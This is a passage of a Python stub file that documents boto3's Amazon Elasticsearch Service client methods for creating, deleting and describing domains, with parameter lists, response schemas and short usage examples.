- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should be equal to the number of subnets if VPC endpoints are enabled
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
- **EBSOptions** *(dict) --*
The ``EBSOptions`` for the specified domain. See `Configuring EBS-based Storage <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-ebs>`__ for more information.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPS for a Provisioned IOPS EBS volume (SSD).
- **AccessPolicies** *(string) --*
IAM access policy as a JSON-formatted string.
- **SnapshotOptions** *(dict) --*
Specifies the status of the ``SnapshotOptions``
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
- **VPCOptions** *(dict) --*
The ``VPCOptions`` for the specified domain. For more information, see `VPC Endpoints for Amazon Elasticsearch Service Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html>`__ .
- **VPCId** *(string) --*
The VPC Id for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- **SubnetIds** *(list) --*
Specifies the subnets for VPC endpoint.
- *(string) --*
- **AvailabilityZones** *(list) --*
The availability zones for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for VPC endpoint.
- *(string) --*
- **CognitoOptions** *(dict) --*
The ``CognitoOptions`` for the specified domain. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
- **EncryptionAtRestOptions** *(dict) --*
Specifies the status of the ``EncryptionAtRestOptions`` .
- **Enabled** *(boolean) --*
Specifies the option to enable Encryption At Rest.
- **KmsKeyId** *(string) --*
Specifies the KMS Key ID for Encryption At Rest options.
- **NodeToNodeEncryptionOptions** *(dict) --*
Specifies the status of the ``NodeToNodeEncryptionOptions`` .
- **Enabled** *(boolean) --*
Specify true to enable node-to-node encryption.
- **AdvancedOptions** *(dict) --*
Specifies the status of the ``AdvancedOptions`` .
- *(string) --*
- *(string) --*
- **LogPublishingOptions** *(dict) --*
Log publishing options for the given domain.
- *(string) --*
Type of log file. It can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time to execute than the configured index query log threshold.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time to execute than the configured search query log threshold.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
The log publishing option that is set for the given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the CloudWatch log group to which the log needs to be published.
* Enabled: Whether log publishing for the given log type is enabled or not.
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the CloudWatch log group to which the log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether the given log publishing option is enabled.
- **ServiceSoftwareOptions** *(dict) --*
The current status of the Elasticsearch domain's service software.
- **CurrentVersion** *(string) --*
The current service software version that is present on the domain.
- **NewVersion** *(string) --*
The new service software version if one is available.
- **UpdateAvailable** *(boolean) --*
``True`` if you are able to update your service software version. ``False`` if you are not able to update your service software version.
- **Cancellable** *(boolean) --*
``True`` if you are able to cancel your service software version update. ``False`` if you are not able to cancel your service software version update.
- **UpdateStatus** *(string) --*
The status of your service software update. This field can take the following values: ``ELIGIBLE`` , ``PENDING_UPDATE`` , ``IN_PROGRESS`` , ``COMPLETED`` , and ``NOT_ELIGIBLE`` .
- **Description** *(string) --*
The description of the ``UpdateStatus`` .
- **AutomatedUpdateDate** *(datetime) --*
Timestamp, in Epoch time, until which you can manually request a service software update. After this date, we automatically update your service software.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of the Elasticsearch domain that you are creating. Domain names are unique across the domains owned by an account within an AWS region. Domain names must start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
:type ElasticsearchVersion: string
:param ElasticsearchVersion:
String of format X.Y to specify the version for the Elasticsearch domain, e.g. \"1.5\" or \"2.3\". For more information, see `Creating Elasticsearch Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomains>`__ in the *Amazon Elasticsearch Service Developer Guide* .
:type ElasticsearchClusterConfig: dict
:param ElasticsearchClusterConfig:
Configuration options for an Elasticsearch domain. Specifies the instance type and number of instances in the domain cluster.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should equal the number of subnets if VPC endpoints are enabled.
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
:type EBSOptions: dict
:param EBSOptions:
Options to enable or disable EBS-based storage and to specify the type and size of EBS storage volumes.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPS for a Provisioned IOPS EBS volume (SSD).
:type AccessPolicies: string
:param AccessPolicies:
IAM access policy as a JSON-formatted string.
:type SnapshotOptions: dict
:param SnapshotOptions:
Option to set the time, in UTC format, of the daily automated snapshot. Default value is ``0`` hours.
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
:type VPCOptions: dict
:param VPCOptions:
Options to specify the subnets and security groups for the VPC endpoint. For more information, see `Creating a VPC <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-creating-vpc>`__ in *VPC Endpoints for Amazon Elasticsearch Service Domains* .
- **SubnetIds** *(list) --*
Specifies the subnets for the VPC endpoint.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for the VPC endpoint.
- *(string) --*
:type CognitoOptions: dict
:param CognitoOptions:
Options to specify the Cognito user and identity pools for Kibana authentication. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
:type EncryptionAtRestOptions: dict
:param EncryptionAtRestOptions:
Specifies the Encryption At Rest Options.
- **Enabled** *(boolean) --*
Specifies the option to enable Encryption At Rest.
- **KmsKeyId** *(string) --*
Specifies the KMS Key ID for Encryption At Rest options.
:type NodeToNodeEncryptionOptions: dict
:param NodeToNodeEncryptionOptions:
Specifies the NodeToNodeEncryptionOptions.
- **Enabled** *(boolean) --*
Specify true to enable node-to-node encryption.
:type AdvancedOptions: dict
:param AdvancedOptions:
Option to allow references to indices in an HTTP request body. Must be ``false`` when configuring access to individual sub-resources. By default, the value is ``true`` . See `Configuring Advanced Options <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-advanced-options>`__ for more information. A brief sketch follows this parameter's entries.
- *(string) --*
- *(string) --*
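A minimal sketch of the option described above, using the documented ``rest.action.multi.allow_explicit_index`` key (advanced option values are passed as strings; the key shown is the one the linked guide covers, not an exhaustive list):
::
    # Disallow explicit index references in request bodies so that
    # access policies on individual sub-resources cannot be bypassed.
    AdvancedOptions={
        'rest.action.multi.allow_explicit_index': 'false'
    }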
:type LogPublishingOptions: dict
:param LogPublishingOptions:
Map of ``LogType`` and ``LogPublishingOption`` , each containing options to publish a given type of Elasticsearch log. A hedged sketch of the map shape follows this parameter's entries.
- *(string) --*
Type of log file. It can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time to execute than the configured index query log threshold.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time to execute than the configured search query log threshold.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
The log publishing option that is set for the given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the CloudWatch log group to which the log needs to be published.
* Enabled: Whether log publishing for the given log type is enabled or not.
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the CloudWatch log group to which the log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether the given log publishing option is enabled.
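A hedged sketch of the map shape described above (the log group ARN is a placeholder; the CloudWatch Logs log group and its resource policy must already exist for publishing to work):
::
    LogPublishingOptions={
        'SEARCH_SLOW_LOGS': {
            # Placeholder ARN; substitute your own log group.
            'CloudWatchLogsLogGroupArn': 'arn:aws:logs:us-east-1:123456789012:log-group:es-slow-logs',
            'Enabled': True
        }
    }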
:rtype: dict
:returns:
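**Example**
A minimal end-to-end usage sketch, assuming boto3 is installed and credentials plus a default region are configured; the domain name, version, and sizing values are illustrative only:
::
    import boto3

    client = boto3.client('es')
    # Create a small two-node domain backed by gp2 EBS storage.
    response = client.create_elasticsearch_domain(
        DomainName='my-test-domain',
        ElasticsearchVersion='6.3',
        ElasticsearchClusterConfig={
            'InstanceType': 'm4.large.elasticsearch',
            'InstanceCount': 2,
        },
        EBSOptions={
            'EBSEnabled': True,
            'VolumeType': 'gp2',
            'VolumeSize': 10,
        },
    )
    # Creation is asynchronous; Processing remains True until the domain is active.
    print(response['DomainStatus']['Processing'])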
"""
pass
def delete_elasticsearch_domain(self, DomainName: str) -> Dict:
"""
Permanently deletes the specified Elasticsearch domain and all of its data. Once a domain is deleted, it cannot be recovered.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DeleteElasticsearchDomain>`_
**Request Syntax**
::
response = client.delete_elasticsearch_domain(
DomainName='string'
)
**Response Syntax**
::
{
'DomainStatus': {
'DomainId': 'string',
'DomainName': 'string',
'ARN': 'string',
'Created': True|False,
'Deleted': True|False,
'Endpoint': 'string',
'Endpoints': {
'string': 'string'
},
'Processing': True|False,
'UpgradeProcessing': True|False,
'ElasticsearchVersion': 'string',
'ElasticsearchClusterConfig': {
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
'EBSOptions': {
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
'AccessPolicies': 'string',
'SnapshotOptions': {
'AutomatedSnapshotStartHour': 123
},
'VPCOptions': {
'VPCId': 'string',
'SubnetIds': [
'string',
],
'AvailabilityZones': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
'CognitoOptions': {
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
'EncryptionAtRestOptions': {
'Enabled': True|False,
'KmsKeyId': 'string'
},
'NodeToNodeEncryptionOptions': {
'Enabled': True|False
},
'AdvancedOptions': {
'string': 'string'
},
'LogPublishingOptions': {
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
},
'ServiceSoftwareOptions': {
'CurrentVersion': 'string',
'NewVersion': 'string',
'UpdateAvailable': True|False,
'Cancellable': True|False,
'UpdateStatus': 'PENDING_UPDATE'|'IN_PROGRESS'|'COMPLETED'|'NOT_ELIGIBLE'|'ELIGIBLE',
'Description': 'string',
'AutomatedUpdateDate': datetime(2015, 1, 1)
}
}
}
**Response Structure**
- *(dict) --*
The result of a ``DeleteElasticsearchDomain`` request. Contains the status of the pending deletion, or no status if the domain and all of its resources have been deleted.
- **DomainStatus** *(dict) --*
The status of the Elasticsearch domain being deleted.
- **DomainId** *(string) --*
The unique identifier for the specified Elasticsearch domain.
- **DomainName** *(string) --*
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
- **ARN** *(string) --*
The Amazon Resource Name (ARN) of an Elasticsearch domain. See `Identifiers for IAM Entities <http://docs.aws.amazon.com/IAM/latest/UserGuide/index.html?Using_Identifiers.html>`__ in *Using AWS Identity and Access Management* for more information.
- **Created** *(boolean) --*
The domain creation status. ``True`` if the creation of an Elasticsearch domain is complete. ``False`` if domain creation is still in progress.
- **Deleted** *(boolean) --*
The domain deletion status. ``True`` if a delete request has been received for the domain but resource cleanup is still in progress. ``False`` if the domain has not been deleted. Once domain deletion is complete, the status of the domain is no longer returned.
- **Endpoint** *(string) --*
The Elasticsearch domain endpoint that you use to submit index and search requests.
- **Endpoints** *(dict) --*
Map containing the Elasticsearch domain endpoints used to submit index and search requests. Example ``key, value`` : ``'vpc','vpc-endpoint-h2dsd34efgyghrtguk5gt6j2foh4.us-east-1.es.amazonaws.com'`` .
- *(string) --*
- *(string) --*
The endpoint to which service requests are submitted. For example, ``search-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` or ``doc-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` .
- **Processing** *(boolean) --*
The status of the Elasticsearch domain configuration. ``True`` if Amazon Elasticsearch Service is processing configuration changes. ``False`` if the configuration is active.
- **UpgradeProcessing** *(boolean) --*
The status of an Elasticsearch domain version upgrade. ``True`` if Amazon Elasticsearch Service is undergoing a version upgrade. ``False`` if the configuration is active.
- **ElasticsearchVersion** *(string) --*
The Elasticsearch version of the domain.
- **ElasticsearchClusterConfig** *(dict) --*
The type and number of instances in the domain cluster.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should equal the number of subnets if VPC endpoints are enabled.
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
- **EBSOptions** *(dict) --*
The ``EBSOptions`` for the specified domain. See `Configuring EBS-based Storage <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-ebs>`__ for more information.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPS for a Provisioned IOPS EBS volume (SSD).
- **AccessPolicies** *(string) --*
IAM access policy as a JSON-formatted string.
- **SnapshotOptions** *(dict) --*
Specifies the status of the ``SnapshotOptions`` .
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
- **VPCOptions** *(dict) --*
The ``VPCOptions`` for the specified domain. For more information, see `VPC Endpoints for Amazon Elasticsearch Service Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html>`__ .
- **VPCId** *(string) --*
The VPC ID for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- **SubnetIds** *(list) --*
Specifies the subnets for the VPC endpoint.
- *(string) --*
- **AvailabilityZones** *(list) --*
The availability zones for the Elasticsearch domain. Exists only if the domain was created with VPCOptions.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for the VPC endpoint.
- *(string) --*
- **CognitoOptions** *(dict) --*
The ``CognitoOptions`` for the specified domain. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
- **EncryptionAtRestOptions** *(dict) --*
Specifies the status of the ``EncryptionAtRestOptions`` .
- **Enabled** *(boolean) --*
Specifies the option to enable Encryption At Rest.
- **KmsKeyId** *(string) --*
Specifies the KMS Key ID for Encryption At Rest options.
- **NodeToNodeEncryptionOptions** *(dict) --*
Specifies the status of the ``NodeToNodeEncryptionOptions`` .
- **Enabled** *(boolean) --*
Specify true to enable node-to-node encryption.
- **AdvancedOptions** *(dict) --*
Specifies the status of the ``AdvancedOptions`` .
- *(string) --*
- *(string) --*
- **LogPublishingOptions** *(dict) --*
Log publishing options for the given domain.
- *(string) --*
Type of log file. It can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time to execute than the configured index query log threshold.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time to execute than the configured search query log threshold.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
The log publishing option that is set for the given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the CloudWatch log group to which the log needs to be published.
* Enabled: Whether log publishing for the given log type is enabled or not.
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the CloudWatch log group to which the log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether the given log publishing option is enabled.
- **ServiceSoftwareOptions** *(dict) --*
The current status of the Elasticsearch domain's service software.
- **CurrentVersion** *(string) --*
The current service software version that is present on the domain.
- **NewVersion** *(string) --*
The new service software version if one is available.
- **UpdateAvailable** *(boolean) --*
``True`` if you are able to update your service software version. ``False`` if you are not able to update your service software version.
- **Cancellable** *(boolean) --*
``True`` if you are able to cancel your service software version update. ``False`` if you are not able to cancel your service software version update.
- **UpdateStatus** *(string) --*
The status of your service software update. This field can take the following values: ``ELIGIBLE`` , ``PENDING_UPDATE`` , ``IN_PROGRESS`` , ``COMPLETED`` , and ``NOT_ELIGIBLE`` .
- **Description** *(string) --*
The description of the ``UpdateStatus`` .
- **AutomatedUpdateDate** *(datetime) --*
Timestamp, in Epoch time, until which you can manually request a service software update. After this date, we automatically update your service software.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of the Elasticsearch domain that you want to permanently delete.
:rtype: dict
:returns:
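**Example**
A minimal usage sketch, assuming a configured client and an existing domain; the domain name is illustrative:
::
    import boto3

    client = boto3.client('es')
    response = client.delete_elasticsearch_domain(DomainName='my-test-domain')
    # Deleted is True while resource cleanup is still in progress; once
    # deletion finishes, the domain status is no longer returned at all.
    print(response['DomainStatus']['Deleted'])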
"""
pass
def delete_elasticsearch_service_role(self):
"""
Deletes the service-linked role that Elasticsearch Service uses to manage and maintain VPC domains. Role deletion will fail if any existing VPC domains use the role. You must delete any such Elasticsearch domains before deleting the role. See `Deleting Elasticsearch Service Role <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-enabling-slr>`__ in *VPC Endpoints for Amazon Elasticsearch Service Domains* .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DeleteElasticsearchServiceRole>`_
**Request Syntax**
::
response = client.delete_elasticsearch_service_role()
:returns: None
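**Example**
A hedged sketch of calling this operation defensively, since deletion fails while any VPC domain still uses the role; the exact error returned should be inspected rather than assumed:
::
    import boto3
    from botocore.exceptions import ClientError

    client = boto3.client('es')
    try:
        client.delete_elasticsearch_service_role()
    except ClientError as error:
        # Expected if VPC domains still depend on the role; delete those
        # domains first, then retry.
        print(error.response['Error']['Code'], error.response['Error']['Message'])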
"""
pass
def describe_elasticsearch_domain(self, DomainName: str) -> Dict:
"""
Returns domain configuration information about the specified Elasticsearch domain, including the domain ID, domain endpoint, and domain ARN.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/DescribeElasticsearchDomain>`_
**Request Syntax**
::
response = client.describe_elasticsearch_domain(
DomainName='string'
)
**Response Syntax**
::
{
'DomainStatus': {
'DomainId': 'string',
'DomainName': 'string',
'ARN': 'string',
'Created': True|False,
'Deleted': True|False,
'Endpoint': 'string',
'Endpoints': {
'string': 'string'
},
'Processing': True|False,
'UpgradeProcessing': True|False,
'ElasticsearchVersion': 'string',
'ElasticsearchClusterConfig': {
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
'EBSOptions': {
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
'AccessPolicies': 'string',
'SnapshotOptions': {
'AutomatedSnapshotStartHour': 123
},
'VPCOptions': {
'VPCId': 'string',
'SubnetIds': [
'string',
],
'AvailabilityZones': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
'CognitoOptions': {
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
'EncryptionAtRestOptions': {
'Enabled': True|False,
'KmsKeyId': 'string'
},
'NodeToNodeEncryptionOptions': {
'Enabled': True|False
},
'AdvancedOptions': {
'string': 'string'
},
'LogPublishingOptions': {
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
},
'ServiceSoftwareOptions': {
'CurrentVersion': 'string',
'NewVersion': 'string',
'UpdateAvailable': True|False,
'Cancellable': True|False,
'UpdateStatus': 'PENDING_UPDATE'|'IN_PROGRESS'|'COMPLETED'|'NOT_ELIGIBLE'|'ELIGIBLE',
'Description': 'string',
'AutomatedUpdateDate': datetime(2015, 1, 1)
}
}
}
**Response Structure**
- *(dict) --*
The result of a ``DescribeElasticsearchDomain`` request. Contains the status of the domain specified in the request.
- **DomainStatus** *(dict) --*
The current status of the Elasticsearch domain.
- **DomainId** *(string) --*
The unique identifier for the specified Elasticsearch domain.
- **DomainName** *(string) --*
